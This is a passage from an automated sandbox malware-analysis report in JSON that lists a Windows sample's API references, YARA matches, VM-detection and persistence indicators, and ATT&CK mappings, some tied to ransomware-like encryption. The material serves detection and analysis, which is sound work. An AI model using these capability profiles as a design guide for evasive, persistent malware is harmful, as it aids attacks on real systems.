API (Indicator: \"GetFullPathNameA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"LocalFileTimeToFileTime\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CryptReleaseContext\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateServiceA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"StartServiceA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenServiceA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-242", "type": 2, "relevance": 1, "name": "Contains ability to close a handle to a service (API string)", "description": "Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-209", "type": 2, "relevance": 1, "name": "Contains ability to start a service (API string)", "description": "Found reference to API \"StartServiceA\" (Indicator: \"StartService\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"StartServiceA\" (Indicator: \"StartService\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-191", "type": 2, "relevance": 1, "name": "Able to enumerate service (API string)", "description": "Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".rsrc\" is \"0x34a000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 553314)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00005464\"\n YARA signature for AES encryption matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-199", "type": 2, "relevance": 1, "name": "Contains ability to create a service (API string)", "description": "Found reference to API \"CreateServiceA\" (Indicator: \"CreateService\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CreateServiceA\" (Indicator: \"CreateService\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: The input sample possibly contains the RDTSCP instruction", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-544", "type": 2, "relevance": 1, "name": "Contains ability to open a service (API string)", "description": "Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryW\" (Indicator: \"GetWindowsDirectory\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetWindowsDirectoryW\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"GetNativeSystemInfo\" (Indicator: \"GetNativeSystemInfo\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetFileSizeEx\" (Indicator: \"GetFileSize\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetTempPathW\" (Indicator: \"GetTempPath\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"GetFileSizeEx\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"GetTempPathW\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found string \"7naesu\" (Indicator: \"aes\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameW\" (Indicator: \"GetComputerName\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"GetComputerNameW\" (Indicator: \"GetComputerName\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"ax.id\"\n Heuristic match: \"*g.ro\"\n Heuristic match: \"}1.ng\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-438", "type": 2, "relevance": 3, "name": "Contains ability to perform AES/RC4 encryption (API string)", "description": "Found reference to API \"CryptReleaseContext\" (Indicator: \"CryptReleaseContext\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CryptGenKey\" (Indicator: \"CryptGenKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CryptDecrypt\" (Indicator: \"CryptDecrypt\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CryptEncrypt\" (Indicator: \"CryptEncrypt\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CryptDestroyKey\" (Indicator: \"CryptDestroyKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CryptImportKey\" (Indicator: \"CryptImportKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CryptAcquireContextA\" (Indicator: \"CryptAcquireContext\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-212", "type": 2, "relevance": 1, "name": "Contains ability to perform decryption (API string)", "description": "Found reference to API \"CryptDecrypt\" (Indicator: \"CryptDecrypt\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains ability to perform AES/RC4 encryption (API string)\n Matched sigs: Contains key cryptographic functions (API string)\n Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to import cryptographic keys (seen in ransomware)\n Matched sigs: YARA signature match - AES encryption\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider\n Matched sigs: Contains ability to perform decryption (API string)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Pattern Matching", "identifier": "yara-62", "type": 13, "relevance": 5, "name": "YARA signature match - RSA algorithm (keys)", "description": "YARA signature for RSA public and private key matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegCloseKey\n CreateServiceA\n RegCreateKeyW\n StartServiceA\n LoadLibraryA\n GetFileAttributesA\n CopyFileA\n VirtualProtect\n GetFileAttributesW\n GetModuleFileNameA\n GetStartupInfoA\n GetFileSize\n LockResource\n CreateDirectoryA\n CreateDirectoryW\n GetProcAddress\n GetComputerNameW\n GetFileSizeEx\n GetModuleHandleA\n GetTempPathW\n TerminateProcess\n CreateProcessA\n WriteFile\n Sleep\n CreateFileA\n FindResourceA\n VirtualAlloc", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": 